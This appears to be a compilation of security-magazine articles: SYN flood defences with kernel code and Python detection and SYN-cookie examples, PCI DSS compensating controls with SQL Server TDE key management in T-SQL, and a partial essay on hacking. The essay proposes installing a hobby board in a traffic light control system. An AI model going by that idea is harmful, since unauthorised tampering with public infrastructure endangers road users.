Each connection is different, and thus TCP uses a special data structure called a Transmission Control Block (TCB) to maintain all the vital information about a connection. The devices maintain their own TCB for each connection individually. As soon as a connection starts, the respective TCB holds all the special information about it. Each connection consumes memory according to the TCB and its implementation. TCP SYN-RECEIVED is a half-open state, and the TCB is allocated on receipt of the SYN packet. In a SYN Flood scenario, the complete backlog of TCBs is used up by connections in the SYN-RECEIVED state, with SYN-ACKs sent to the attacker’s fake endpoints, so there remains no room for new TCBs to be put into SYN-RECEIVED, and all further incoming SYNs cannot be handled. Increasing the backlog can tackle a SYN Flood attack to some extent. However, increasing the backlog by too much can have a performance impact as well.

Listing 1. Increasing Backlog – net/core/request_sock.c
    ...
    int sysctl_max_syn_backlog = 1024;  /* default SYN backlog; tunable via net.ipv4.tcp_max_syn_backlog */
    EXPORT_SYMBOL(sysctl_max_syn_backlog);

    int reqsk_queue_alloc(struct request_sock_queue *queue,
                          unsigned int nr_table_entries)
    {
        size_t lopt_size = sizeof(struct listen_sock);
        struct listen_sock *lopt;

        /* clamp the requested backlog to [8, sysctl_max_syn_backlog] and round up to a power of two */
        nr_table_entries = min_t(u32, nr_table_entries, sysctl_max_syn_backlog);
        nr_table_entries = max_t(u32, nr_table_entries, 8);
        nr_table_entries = roundup_pow_of_two(nr_table_entries + 1);
        lopt_size += nr_table_entries * sizeof(struct request_sock *);

        /* the SYN queue hash table: one request_sock pointer per backlog slot */
        if (lopt_size > PAGE_SIZE)
            lopt = vzalloc(lopt_size);
        else
            lopt = kzalloc(lopt_size, GFP_KERNEL);
        if (lopt == NULL)
            return -ENOMEM;

        /* max_qlen_log becomes log2 of the table size */
        for (lopt->max_qlen_log = 3;
             (1 << lopt->max_qlen_log) < nr_table_entries;
             lopt->max_qlen_log++);
        ...

Source: request_sock.c by Arnaldo Carvalho de Melo

One SYN_RECV socket may cost approximately 80 bytes on a 32-bit system. The minimum value is 128 for low-memory machines. Experiments with real servers show that this is very low, as it would be difficult to manage even 100 requests per second. A minimum of 1024 is recommended. However, the actual number depends on the expected number of requests per second. A high-memory machine may handle more user requests per second.

Decreasing SYN-RECEIVED state timeout

Decreasing the SYN-RECEIVED state timeout value will decrease the time a half-open connection occupies the backlog queue, and therefore the effect of a SYN Flood will be reduced. However, a timeout value that is too small may abort even legitimate requests. In the case of a SYN Flood, the attacked server itself never recognizes the bogus requests. At the gateway level, however, these requests can be discarded and the SYN Flood situation tackled. In new-generation firewalls a semi-transparent gateway mechanism helps tackle SYN Floods by completing the three-way handshake with the client on the server’s behalf and only then completing the handshake with the server in a secure manner.
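The netstat count in Table 1 gives one number for the whole host, and as written the grep SYN filter also matches the host’s own outbound SYN_SENT sockets. The following Python script is an added illustration, not part of the article: it parses constructed netstat -nap output, counts only SYN_RECV sockets, applies the Table 1 thresholds, and reports where the half-open connections concentrate (target port and source network) and how they compare with an assumed tcp_max_syn_backlog of 1024.

```python
import ipaddress
import re
from collections import Counter

# Constructed `netstat -nap` output (not a real capture): 1200 half-open
# connections to port 80 from one /24, two established sessions, and one
# outbound SYN_SENT that a plain `grep SYN` would also count.
_HEADER = (
    "Active Internet connections (servers and established)\n"
    "Proto Recv-Q Send-Q Local Address   Foreign Address   State   PID/Program name\n"
)
_HALF_OPEN = "\n".join(
    f"tcp   0   0 10.0.0.5:80   203.0.113.{i % 250 + 1}:{40000 + i}   SYN_RECV   -"
    for i in range(1200)
)
SAMPLE_NETSTAT = _HEADER + _HALF_OPEN + "\n" + "\n".join([
    "tcp   0   0 10.0.0.5:22   198.51.100.7:51234   ESTABLISHED   812/sshd",
    "tcp   0   0 10.0.0.5:80   198.51.100.8:33120   ESTABLISHED   950/nginx",
    "tcp   0   0 10.0.0.5:43210   198.51.100.9:443   SYN_SENT   1001/curl",
]) + "\n"

_LINE_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+)\s+(\S+)\s+(\S+)")


def parse_netstat(text):
    """Yield (local_port, remote_address, state) for each TCP socket line."""
    for line in text.splitlines():
        m = _LINE_RE.match(line)
        if not m:
            continue
        local, remote, state = m.groups()
        local_port = int(local.rsplit(":", 1)[1])
        remote_addr = remote.rsplit(":", 1)[0]
        yield local_port, remote_addr, state


def count_like_grep(text):
    """What `netstat -nap | grep SYN | wc -l` counts: every line containing SYN,
    which includes the host's own outbound SYN_SENT sockets."""
    return sum(1 for line in text.splitlines() if "SYN" in line)


def classify(syn_recv_count):
    """Table 1 thresholds from the article (the 1000 and 5000 boundaries are
    assigned to the lower band here; the article leaves them open)."""
    if syn_recv_count < 1000:
        return "SYN Flood attack less likely"
    if syn_recv_count <= 5000:
        return "Possible SYN Flood attack"
    return "SYN Flood attack"


def source_network(addr):
    """Aggregate sources to /24 (IPv4) or /64 (IPv6) to spot a flood from one range."""
    ip = ipaddress.ip_address(addr)
    prefix = 24 if ip.version == 4 else 64
    return str(ipaddress.ip_network(f"{ip}/{prefix}", strict=False))


def analyse(text, max_syn_backlog=1024):
    """Count SYN_RECV sockets, apply Table 1, and report where they concentrate
    and how they compare with the configured tcp_max_syn_backlog (assumed 1024)."""
    half_open = [(port, addr) for port, addr, state in parse_netstat(text)
                 if state == "SYN_RECV"]
    by_port = Counter(port for port, _ in half_open)
    by_net = Counter(source_network(addr) for _, addr in half_open)
    n = len(half_open)
    return {
        "syn_recv": n,
        "status": classify(n),
        "backlog_used_pct": round(100.0 * n / max_syn_backlog, 1),
        "top_port": by_port.most_common(1)[0] if by_port else None,
        "top_source_net": by_net.most_common(1)[0] if by_net else None,
    }


if __name__ == "__main__":
    print("grep-style count:", count_like_grep(SAMPLE_NETSTAT))
    print(analyse(SAMPLE_NETSTAT))
```

On a live host, feed the script the real output of netstat -nap (or ss -tan, whose column layout differs and would need its own regex).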
On Linux, for example, the tcp_synack_retries setting tells the kernel the number of times a SYN,ACK may be retransmitted in response to a SYN, which helps in dealing with a SYN Flood.

Listing 2. An ipv4 sysctl.conf
    ...
    net.ipv4.tcp_fin_timeout = X
    net.ipv4.tcp_max_orphans = X
    net.ipv4.tcp_max_syn_backlog = X
    net.ipv4.tcp_rmem = 4096 87380 X
    net.ipv4.tcp_sack = X
    net.ipv4.tcp_syn_retries = X
    net.ipv4.tcp_synack_retries = X
    net.ipv4.tcp_syncookies = X
    net.ipv4.tcp_timestamps = X
    net.ipv4.tcp_tw_recycle = X
    net.ipv4.tcp_wmem = X

A careful setting of tcp_synack_retries may give the desired results in handling a SYN Flood.

SYN Cache implementation

The SYN cache replaces the per-socket linear chain of unfinished queued requests with a global hash table. The SYN caching implementation typically helps by limiting the number of entries in the following manner:
• By putting an upper limit on the memory that the SYN cache uses
• By putting an upper limit on the work a device needs to search for a matching entry and to replace cache entries
SYN Cache settings can be checked in the following manner and edited for optimum performance.

Table 2. SYN Cache setting in /boot/loader.conf
    Input:   sysctl -a | grep syncache
    Output:  net.inet.tcp.syncache.rexmtlimit: X
             net.inet.tcp.syncache.hashsize: X
             net.inet.tcp.syncache.count: X
             net.inet.tcp.syncache.cachelimit: X
             net.inet.tcp.syncache.bucketlimit: X

This implementation is special because secret bits are mixed into the hash, which prevents an attacker from targeting particular hash values in order to exhaust a bucket limit; the limits bound both CPU time and memory. The bucket limit is set for each hash value; upon reaching the limit, the oldest entry is released.

SYN Cookies

SYN Cookies are a stateless SYN proxy mechanism. This is so because no state is assigned to connections in SYN-RECEIVED. Here the state is instead encoded in the sequence number sent on the SYN-ACK.
A legitimate client can thus still complete the handshake, whereas bogus requests fail without occupying state in a TCB. If the client sends a subsequent ACK response, the server can reconstruct the SYN queue entry using the details encoded in the TCP sequence number. tcp_syncookies can be enabled in the following manner:

Table 3. SYN Cookies setting in /etc/sysctl.conf
    Step  Activity                         Command / content
    1     Edit the file /etc/sysctl.conf   vi /etc/sysctl.conf
    2     Append the following             net.ipv4.tcp_syncookies = 1
    3     Save the changes                 sysctl -p

Other approaches

There can be other approaches as well to contain SYN Floods. These can be:
• New Generation Firewall & Proxy Servers
• Recycling of the oldest half-open TCBs
• Dynamic & adaptive threshold tuning and profiling
• Exception recording, etc.

References
• http://www.ietf.org/rfc/rfc4987.txt
• http://linux.die.net/man/8/hping3
• http://www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_9-4/syn_flooding_attacks.html
• https://www.ietf.org/rfc/rfc2827.txt
• http://www.ietf.org/rfc/rfc3704.txt
• request_sock.c by Arnaldo Carvalho de Melo

About the Author

Ratan Jyoti is currently working as a Chief Manager (Information Security) at a leading Indian Bank. He has more than 12 years’ experience in IT and Information Security in the Banking Industry. He is a Certified Information Systems Security Professional, Certified Information Systems Auditor and a Certified Ethical Hacker. His major areas of expertise include Information Security Governance, Information Risk Management, IS Audit, Cyber forensics, Information Security Management System and Compliance. He is a regular contributor to reputed International Journals and Magazines in the area of Information Security.
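To make the SYN cookie mechanism described in the article above concrete, here is an added Python illustration (not the article’s code and not the Linux kernel’s cookie function). It follows the cookie layout summarised in RFC 4987: a 5-bit time counter, a 3-bit MSS index and a 24-bit keyed hash of the connection 4-tuple and counter are packed into the SYN-ACK sequence number, so the server allocates no TCB and reconstructs the client’s MSS from the ACK number that a genuine client returns. The secret key, clock, MSS table and addresses are constructed for the example.

```python
import hashlib
import hmac
import ipaddress
import struct
import time

# Constructed MSS table: a 3-bit index in the cookie selects one of these values,
# because with no TCB the server must recover the client's MSS from the ACK.
MSS_TABLE = (536, 1300, 1440, 1460)


class SynCookieServer:
    """Stateless handling of the SYN-RECEIVED step (illustrative layout per
    RFC 4987: 5 bits time counter | 3 bits MSS index | 24 bits keyed hash)."""

    def __init__(self, secret, clock):
        self.secret = secret   # per-host secret used for the keyed hash
        self.clock = clock     # callable returning seconds; injected for testing

    @staticmethod
    def _counter(seconds):
        # Coarse time counter: one tick per 64 s, wrapped to 5 bits.
        return (seconds // 64) & 0x1F

    def _mac24(self, saddr, sport, daddr, dport, t):
        msg = (ipaddress.ip_address(saddr).packed
               + ipaddress.ip_address(daddr).packed
               + struct.pack("!HHB", sport, dport, t))
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:3], "big")

    def make_cookie(self, saddr, sport, daddr, dport, client_mss):
        """Initial sequence number for the SYN-ACK; nothing is stored server-side."""
        t = self._counter(self.clock())
        idx = 0
        for i, mss in enumerate(MSS_TABLE):   # largest table entry not above client's MSS
            if mss <= client_mss:
                idx = i
        return (t << 27) | (idx << 24) | self._mac24(saddr, sport, daddr, dport, t)

    def check_ack(self, saddr, sport, daddr, dport, ack_number):
        """Validate the handshake's final ACK and rebuild what the SYN queue entry
        would have held (the MSS). Returns None when the cookie is stale or was
        not issued for this 4-tuple, so a bogus or spoofed ACK costs no state."""
        cookie = (ack_number - 1) & 0xFFFFFFFF          # the client acks our ISN + 1
        t, idx, mac = cookie >> 27, (cookie >> 24) & 0x7, cookie & 0xFFFFFF
        age = (self._counter(self.clock()) - t) & 0x1F
        if age > 1:                                      # older than about two ticks
            return None
        expected = self._mac24(saddr, sport, daddr, dport, t)
        if not hmac.compare_digest(mac.to_bytes(3, "big"), expected.to_bytes(3, "big")):
            return None
        return MSS_TABLE[idx]


if __name__ == "__main__":
    srv = SynCookieServer(b"constructed-secret-key", lambda: int(time.time()))
    isn = srv.make_cookie("203.0.113.5", 40001, "10.0.0.5", 80, 1460)
    print("SYN-ACK seq (cookie): 0x%08x" % isn)
    print("MSS recovered from ACK:", srv.check_ack("203.0.113.5", 40001, "10.0.0.5", 80, isn + 1))
    print("spoofed ACK from another source:", srv.check_ack("203.0.113.6", 40001, "10.0.0.5", 80, isn + 1))
```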
IMPLEMENTATION OF TRANSPARENT DATA ENCRYPTION (TDE) AND ADDITIONAL COMPENSATIONAL CONTROLS AS ALTERNATIVE METHOD REGARDING ENCRYPTION OF PAN NUMBERS IN MICROSOFT SQL DATABASE (PCI DSS V3.0, SECTION 3.4)
by Darko Mihajlovski, Kiril Buhov, Jani Nikolov

A “proper” TDE implementation should cover requirement 3.4 of PCI DSS v3, which demands the following: Render PAN unreadable anywhere it is stored (including on portable digital media, backup media, and in logs) by using any of the following approaches:
• One-way hashes based on strong cryptography (hash must be of the entire PAN)
• Truncation (hashing cannot be used to replace the truncated segment of PAN)
• Index tokens and pads (pads must be securely stored)
• Strong cryptography with associated key-management processes and procedures

It has come to Visa’s attention that certain assessors and merchants require clarification about the intent of PCI DSS requirement 3.4. PCI Requirement 3.4 states: Render sensitive cardholder data unreadable anywhere it is stored (including data on portable media, in logs and data received from or stored by wireless networks) by using any of the following approaches:
• One-way hashes (hashed indexes) such as SHA-1
• Truncation
• Index tokens and PADs, with the PADs being securely stored
• Strong cryptography, such as Triple-DES 128-bit or AES 256-bit, with associated key management processes and procedures.
The MINIMUM account information that needs to be rendered unreadable is the payment card account number. The use of encryption to render cardholder data unreadable is a highly effective and readily accepted way to secure data. For companies that are unable to employ sufficient encryption solutions due to technical constraints, compensating controls may be considered.
Only companies that have undertaken a risk analysis and have legitimate technological or business constraints will be considered for use of compensating controls to achieve compliance. Compensating controls must provide additional protection to mitigate any additional risk posed by the unencrypted data. Compensating controls considered must be in addition to controls required in the PCI DSS. It is not a compensating control to simply be in compliance with other PCI requirements. Encryption, while a desirable approach, is not the only approach to meeting PCI 3.4. The problem occurs when the System/Application/Software Vendor tells you that encrypting the PANs is not a possible option.

PCI AND THE ART OF THE COMPENSATING CONTROL

Compensating controls are a standard part of any security posture. But what makes an effective compensating control? In the early years of the Payment Card Industry Data Security Standard (PCI DSS), and even in one author’s experience under the CISP program, the term compensating control was used to describe everything from a legitimate work-around for a security challenge to a shortcut to compliance. If you are considering a compensating control, you must perform a risk analysis and have a legitimate technological or documented business constraint before you even go to the next step. Companies being assessed will present more documented business constraints for review based on the current economic situation. Every compensating control must meet four criteria before it can be considered for validity. The four things that every compensating control must do are:
• meet the intent and rigor of the original PCI DSS requirement,
• provide a similar level of defense as the original PCI DSS requirement,
• be “above and beyond” other PCI DSS requirements, and
• be commensurate with the additional risk imposed by not adhering to the PCI DSS requirement.
An example of a valid control might be using extra logs for the su command in UNIX to track actions executed under a shared root password. In rare cases, a system may not be able to use something like sudo to prevent shared administrator passwords from being used. Keep in mind, this is not a license to use shared passwords everywhere in your environment. Nearly every system has the ability to use something like sudo, or “Run As”, which is free or built into your OS, or a commercial variant if your platform requires this.

WHERE ARE COMPENSATING CONTROLS IN PCI DSS?

Compensating controls are not specifically defined inside PCI, but are instead defined by you (as a self-certifying merchant) or your QSA. That’s where the trouble starts. Thankfully, the PCI Council provides an example of a completed compensating control in Appendix C of the PCI DSS, as well as a blank template to fill out. Appendix B provides all the guidance they feel necessary in order to design a compensating control. Compensating controls are ultimately accepted by acquirers or the card brands themselves (if applicable), so even after putting all of this information together you could face the rejection of your control and a significant amount of expense re-architecting your process to fit the original control. This is where an experienced QSA can really help you ensure your control passes the “Sniff Test.” If it smells like a valid control, it probably will pass. If you need examples, look later in this chapter under the section titled “Funny Controls You Didn’t Design.”

WHAT A COMPENSATING CONTROL IS NOT

Compensating controls are not a shortcut to compliance. In reality, most compensating controls are actually harder to do and cost more money in the long run than actually fixing or addressing the original issue or vulnerability.
Imagine walking into a meeting with a customer that has an open, flat network, with no encryption anywhere to be found (including on their wireless network, which is not segmented either). Keep in mind, network segmentation is not required by PCI, but it does make compliance easier. Usually in this situation, assessors may find a legacy system that cannot be patched or upgraded, but now comes into scope. Then the conversation about compensating controls starts. Now imagine someone in internal assessment telling you not to worry because they would just get some compensating controls. Finally, imagine they tell you this in the same voice and tone as if they were going down to the local drug store to pick up a case of compensating controls on aisle five. Compensating controls were never meant to be a permanent solution for a compliance gap. Encryption requirements on large systems were made unreasonable early in this decade. Not only was there limited availability of commercial off-the-shelf software, but it was prohibitively expensive to implement. For Requirement 3.4 (Render PAN, at minimum, unreadable anywhere it is stored), card brands (largely Visa at the time) were quick to point out that compensating controls could be implemented for this requirement; one of those being strong access controls on large systems. For mainframes, assessors would typically do a cursory walk through the controls and continue to recommend an encryption solution at some point for those systems. At one point, compensating controls were deemed to have a lifespan; meaning that the lack of encryption on a mainframe would only be accepted for a certain period of time. After that, companies would need to put encryption strategies in place. Compensating control life spans never materialized.
Compensating controls can be used for nearly every single requirement in the DSS, the most notable exception being permissible storage of sensitive authentication data after authorization. There are many requirements that commonly show up on compensating control worksheets, Requirement 3.4 being one of them. To clarify: it is up to the QSA performing the assessment to decide to accept the control initially, but the Acquiring Bank (for merchants) has the final say. Substantial documentation and an open channel of communication to your acquirer are essential to ensure money is not wasted putting together controls that ultimately do not pass muster. Still, compensating controls are a viable path to compliance even considering the above caveats and descriptions of why you may not want to use them.

HOW TO CREATE A GOOD COMPENSATING CONTROL

We’ve spent quite a bit of time setting this section up. We talked about what compensating controls are, what they are not, and some of the best misguided attempts to create them. Before we discuss the examples, please remember that these examples should be used for illustrative purposes only. I have oversimplified the scenarios for brevity, and things are rarely this simple in the corporate world. Ultimately, compensating controls must be approved first by a QSA, or barring that, your Acquiring Bank. I know I don’t like it when someone brings an article about PCI to an interview during an assessment, so please don’t do that with this one. Now let’s walk through a couple of examples of how one might create a good compensating control.

Here’s a common compensating control that QSAs will define and implement at a customer. A Level 1 brick-and-mortar retailer with 2,500 stores has some systems in their stores that do not process cardholder data.
These systems are a high risk to this customer’s cardholder environment because they may access both the internet through a local firewall and the corporate intranet and webmail system, and users log in to that machine with the default administrator account. Store managers and retail operations claim that the systems are required for day-to-day business because each store is empowered to customize its operations to better fit the local market. The corporation believes this drives innovation and helps them maintain a competitive edge over their peers. If the retailer chooses not to segment the network, all of the systems in the store are now in scope, and they must meet all of the applicable requirements of the PCI DSS. Doing this will add significant expense to the IT infrastructure, and will probably force a call center to be staffed up in order to manage the volume of calls that will come in for things like password maintenance.

What do you do? Do you crush the retailer’s aspirations to innovate by telling them they must deploy Active Directory to these machines, lock them down Department of Defense tight, and staff a call center? That is one option. But if you made that recommendation you missed something important: understanding the business and limiting the impact that your compliance recommendations make. Instead, consider this compensating control. Any number of network components could be used to create some segmentation in this environment. Let’s say that we have a VLAN (Virtual Local Area Network) aware switch at the location that can have access lists (ACLs) tied to it. Why not create a new VLAN for just the POS network? Then create some ACLs around it to make it look like it is segmented behind a firewall. Now the threat of the in-store PC is effectively mitigated, provided that the ACLs are appropriately secure. “But my store networks are different in every store,” you say.
“I can’t just slap something in there like that and expect it to work globally!” If this is the case, is your store support group overloaded with break-fix calls? Maybe this could be an opportunity to shore this up and base each store’s network on a consistent footprint?

APPROACH TO THE PROBLEM

SQL Server has advanced over the years to become a very popular, capable database, evolving from a primarily departmental and SMB database to a fully enterprise-capable platform. SQL Server’s appeals are many, from its highly scalable and secure database engine to its built-in reporting and data analysis tools. SQL Server 2008 offers new features of particular interest to PCI DSS compliance, including:

• Full database encryption through Transparent Data Encryption (TDE)
• Split key ownership through Extensible Key Management (EKM)
• Granular auditing capabilities through SQL Server Audit and Change Data Capture
• Continued support of signed modules
• Built-in control over default SQL Server 2008 features
• Stronger control and auditability over server and database configuration through Policy-Based Management

Implementation of the PCI DSS controls through SQL Server 2008 technology allows for the ability to standardize and automate security controls effectively and efficiently, particularly when applied during the installation process.

SQL SERVER 2008 TRANSPARENT DATA ENCRYPTION OFFERS FULL DATA ENCRYPTION

“Transparent data encryption (TDE) performs real-time I/O encryption and decryption of the data and log files. The encryption uses a database encryption key (DEK), which is stored in the database boot record for availability during recovery. The DEK is a symmetric key secured by using a certificate stored in the master database of the server or an asymmetric key protected by an EKM module. TDE protects data “at rest”, meaning the data and log files. It provides the ability to comply with many laws, regulations, and guidelines established in various industries.
This enables software developers to encrypt data by using AES and 3DES encryption algorithms without changing existing applications.”

When choosing to enable TDE in your environment there are a number of factors to consider during the implementation. First, TDE only secures data at rest and does not help to secure the communication of the data (such as during remote ODBC queries). Second, the certificate used to encrypt the data is required during any attempt to decrypt the data. Third, complete and accurate backups of the certificate are required to minimize the risk of data loss. Backups of the database itself will be encrypted and will require the certificate as well.

USING MANUAL KEY MANAGEMENT

If you are using manual key management, several steps will be required. You will need to create a database master key in the master database (be sure to use a strong password to protect the key). The database master key you have created will be used to protect the TDE certificate. You are now ready to back up the master database master key to a removable disk and store it in a safe location. At this point, you are ready to create a certificate in the master database protected by the database master key. Once again, remember to back up the certificate to a removable disk and store it in a safe location. Only users who need access to cardholder data should be given permissions to any keys and certificates used to decrypt sensitive data. As noted above, encryption keys may be managed manually or through an encryption key management software package in SQL Server 2008. In the case of SQL Server, the TDE database encryption key must be replaced at least once per year. You will need to generate or load a new certificate or asymmetric key, back up the certificate, and re-encrypt the database encryption key using the new certificate.
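As an added example (this is not code from the article or its authors), the manual key management sequence described in this section is written out below in T-SQL for SQL Server 2008: database master key, certificate, backups, database encryption key, enabling TDE, then the annual certificate rotation and the queries an assessor can run to confirm the result. It also checks two items from the configuration checklist at the end of the article (the sa login and the BUILTIN\Administrators group). The database name CardholderDB, the certificate names, the backup paths under E:\keybackup and every password are placeholders; the pvt_key_last_backup_date column of sys.certificates is assumed to be available on the version in use.

```sql
-- Added example, not from the article: manual TDE key management on SQL Server 2008.
-- CardholderDB, certificate names, E:\keybackup paths and all passwords are placeholders.
USE master;
GO

-- 1. Database master key (DMK) in master, protected by a strong password.
--    Under split knowledge, two custodians each type their half of this password.
CREATE MASTER KEY ENCRYPTION BY PASSWORD = '<half-from-custodian-A><half-from-custodian-B>';
GO

-- 2. Back up the master DMK to removable media (tamper-evident container, dual control).
BACKUP MASTER KEY TO FILE = 'E:\keybackup\master_dmk.key'
    ENCRYPTION BY PASSWORD = '<dmk-backup-password>';
GO

-- 3. Certificate in master, protected by the DMK; it will protect the DEK.
CREATE CERTIFICATE TDE_Cert_2015 WITH SUBJECT = 'TDE certificate for CardholderDB';
GO

-- 4. Back up the certificate together with its private key; a restore needs both.
BACKUP CERTIFICATE TDE_Cert_2015 TO FILE = 'E:\keybackup\TDE_Cert_2015.cer'
    WITH PRIVATE KEY (FILE = 'E:\keybackup\TDE_Cert_2015.pvk',
                      ENCRYPTION BY PASSWORD = '<cert-backup-password-2015>');
GO

-- 5. Database encryption key (DEK) inside the cardholder database, then turn TDE on.
USE CardholderDB;
GO
CREATE DATABASE ENCRYPTION KEY
    WITH ALGORITHM = AES_256
    ENCRYPTION BY SERVER CERTIFICATE TDE_Cert_2015;
GO
ALTER DATABASE CardholderDB SET ENCRYPTION ON;
GO

-- 6. Annual rotation: new certificate, back it up, re-encrypt the DEK with it.
--    TDE_Cert_2015 and its backup are kept: restores of older database backups need it.
USE master;
GO
CREATE CERTIFICATE TDE_Cert_2016 WITH SUBJECT = 'TDE certificate for CardholderDB (rotated)';
BACKUP CERTIFICATE TDE_Cert_2016 TO FILE = 'E:\keybackup\TDE_Cert_2016.cer'
    WITH PRIVATE KEY (FILE = 'E:\keybackup\TDE_Cert_2016.pvk',
                      ENCRYPTION BY PASSWORD = '<cert-backup-password-2016>');
GO
USE CardholderDB;
GO
ALTER DATABASE ENCRYPTION KEY ENCRYPTION BY SERVER CERTIFICATE TDE_Cert_2016;
GO

-- 7. Evidence for the assessor: is the database encrypted, which certificate protects
--    the DEK, when the DEK was last re-encrypted (modify_date), and whether the private
--    key of that certificate has ever been backed up (column assumed present).
SELECT DB_NAME(k.database_id)   AS database_name,
       k.encryption_state,           -- 3 = encrypted, 2 = encryption in progress
       c.name                    AS protecting_certificate,
       k.regenerate_date,
       k.modify_date,
       c.pvt_key_last_backup_date    -- NULL means the certificate was never backed up
FROM sys.dm_database_encryption_keys AS k
JOIN master.sys.certificates        AS c ON c.thumbprint = k.encryptor_thumbprint;
GO

-- 8. Two server-level checklist items: sa disabled under Windows authentication, and
--    BUILTIN\Administrators not in sysadmin.
SELECT SERVERPROPERTY('IsIntegratedSecurityOnly') AS windows_auth_only;   -- expect 1
SELECT name, is_disabled FROM sys.server_principals WHERE sid = 0x01;     -- sa; expect 1
ALTER LOGIN sa DISABLE;                                                   -- remediation
SELECT IS_SRVROLEMEMBER('sysadmin', 'BUILTIN\Administrators') AS builtin_admins_sysadmin; -- expect 0 or NULL
GO
```

The rotation in step 6 replaces the certificate protecting the DEK rather than regenerating the DEK itself, which matches the sequence the section describes (new certificate, back it up, re-encrypt the DEK). The query in step 7 is the one worth keeping on hand: a NULL in pvt_key_last_backup_date for the protecting certificate means a disk failure on the server would make every TDE-protected backup unrestorable.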
It is important to keep backups of prior certificates, as those will be required to restore copies of the database made when those certificates were active. Keep in mind this is also required when using EKM-generated asymmetric keys; however, the EKM provider should have features for managing this.

Two access rules apply to the backup locations. First, any user that can back up keys and certificates should have write access to the backup folder location, but be denied read access to that location. Second, users with access to the key and certificate backup folders should be denied access to any backups of the database. To make certain that this is the case, the user who backs up the database should not be the same user who backs up the certificates.

At a high level, if an organization is using manual key management, the key must be stored on tamper-evident media, or in a tamper-evident container. In some instances something as simple as a pressure-sealed envelope may suffice. The keys must also be placed under dual control. An example of dual control might be a key file an organization has placed in a “lockbox” inside of a safe. The key to the lockbox and the key to the safe would be given to separate individuals. Thus two people are required to act in concert to recover the key. Lastly, any plaintext instances of cryptographic keys must be under split knowledge. Split knowledge requires that no single individual has access to the entire plaintext key. Using our “lockbox in a safe” example, split knowledge might require that the actual key is stored in two “halves”, potentially in separate lockboxes inside the safety deposit box.

Looking at what this means for SQL Server when using manual key management: first create a database master key in the master database. Be sure to use a strong password to protect the key, with parts of the password entered by two individuals. The database master key you have created will be used to protect the TDE certificate.
You are now ready to back up the master database master key and/or the TDE certificate to removable media. Be certain to store it in a safe location, and employ secure storage mechanisms meeting the requirements of tamper evidence, dual control, and split knowledge referenced above. At this point, you are ready to create a certificate in the master database protected by the database master key. Once again, remember to back up the certificate to removable media and store it securely.

When using manual key management, careful consideration must be given to access to the data-encrypting keys and key-encrypting keys so that your organization can achieve proper implementation of split knowledge. For example, it may be required to have two individuals present to enter portions of the password assigned to the backup certificates. A similar requirement may exist for access to service accounts which can access the keys. Remember to carefully consider which users or service accounts have sufficient access to the database boot file, as that will be the “key to the kingdom”.

It should also be mentioned that the environment should fulfil the following:

• SA disabled when using Windows authentication mode
• BUILTIN\Administrators group not a member of the sysadmin role
• Use of signed modules
• Role-based access
• Hard segregation of duties, with segregation matrices, evidence, etc.
• Hardening of the database configuration, using the Microsoft SQL 2008 Server Hardening Guide, Version 1.0.0, 19 May 2011 as a reference

About the Authors

Darko Mihajlovski, MSc EE, C|EH, Certified Lead ISO27001:2013 Auditor. He has been working as a Chief Information Security Officer in a large company for the past six years and is also involved in information security projects, intended primarily for improving IS management in other companies, as an Information Security Professional. He is an ISMS expert in the field of implementing ISO27001:2005 and PCI DSS 2.0, experienced in auditing information systems, incident management, audit trail analysis, and penetration testing. Head of Information Security Department, Halkbank AD Skopje, [email protected].

Kiril Buhov, MSc PM. Head of Information Systems and Technical Support Department, Halkbank AD Skopje, [email protected].

Jani Nikolov, MSc.B. Head of Card Processing and Alternative Channels Department, Halkbank AD Skopje, [email protected].

Hacking Journalists
by Bob Monroe

There was a time when a reporter was called a hack. This term referred to their ability to hack away on a typewriter to create a story on a short deadline. Somewhere in the 1950s, MIT’s Railroad Club adopted the term when they saw a cool use of technology. Railroads helped to build the world and spread commerce across the globe. This was a proud term, a name for an action that you could be pleased to have been associated with. Then, somewhere, that hack name started to be used for criminal internet activity. Today, a hacker is someone to be put in jail just for being called that nasty name.
Security vendors use slogans like “Stop Hackers in their Tracks” and “Fight Hackers Where They Attack”. Okay, maybe these are termite pest control slogans, but the meaning is the same: hackers are bad people, according to the press. The problem is that hackers aren’t bad people. Bad people are bad people. There is a huge difference between a hacker and a criminal. Some hacks actually save lives.

Here is a nice hack for you: There is a microcontroller board called the TouchBoard made by Bare Conductive. I bought two of them when Radio Shack started selling off their inventory around here. Each board cost me $10. Basically the board is a sensor controller. The device has twelve touch sensors that connect to a processor, and the operating system is stored on a microSD card. When powered up with headphones or speakers attached, if you touch one of the sensors, a song is played from the storage card. You can change out the songs just by renaming and copying your songs over the ones on the tiny media card. If you press one sensor you get some jazz music. You touch another and you get some Frank Sinatra. A third sensor plays a symphony. You get the idea. Twelve sensors, twelve outputs. But with this board, there are two other output modes on the circuits. How can we hack this?

Let’s say you live in a home where you’ve installed this $10 board to act as a sensor controller. When you step into your home, an IR detector senses your presence and activates the first touch sensor. This sensor is wired to your air conditioning unit. It is preset to turn on at 22 degrees Celsius when activated. Walking in the front door activates this first environmental device. The second sensor is already activated because it is wired to a light sensor outside your house. It just detects whether it is light or dark outside. Since you work long hours, you often come home late to a dark house.
Since this sensor is already activated, when you walk in the front door, that switch is tripped and lights turn on to illuminate your hallway. So we have two sensors working now. Let’s look at the third sensor on the twelve-sensor device. This third sensor is wired to your media player. You like to come home to some music. When you enter your front door the third sensor is activated and your media player is already programmed to play some nice heavy metal or Danish folk songs, your choice. Right there we’ve turned a $10 MP3 player into a home automation platform, or a smart home as the media would call it.

Now, let’s take this same hack to another level; that’s what hackers do, we try new things with existing technology. Around where I live, we have a problem with cars running red lights. As a hacker, I never want to see anyone hurt, so I want to come up with an easy solution to stop this reckless problem. I install the same $10 TouchBoard in the traffic light management system located near the sidewalk. Next, we set up an inexpensive IR beam by the traffic light that shines down at an angle onto the pavement below. A beam like this would cost around $3 at Radio Shack. Next to the beam we install a Passive Infrared Detector (PID), which also costs a whole $11 at Radio Shack. The IR beam hits the pavement and is reflected back to the PID. IR is great at detecting heat and motion, like an on/off switch but with precision. Next, we set up a small algorithm that can determine the speed of an approaching vehicle. When a vehicle enters the beam field as the traffic light begins to turn from green to yellow, a calculation is made to determine the speed of that approaching traffic. We can easily figure out whether that incoming car will be able to stop in time to meet the coming red light. If that vehicle is moving too fast to safely brake for the red light, it’s simple human nature that the driver will run the red light.
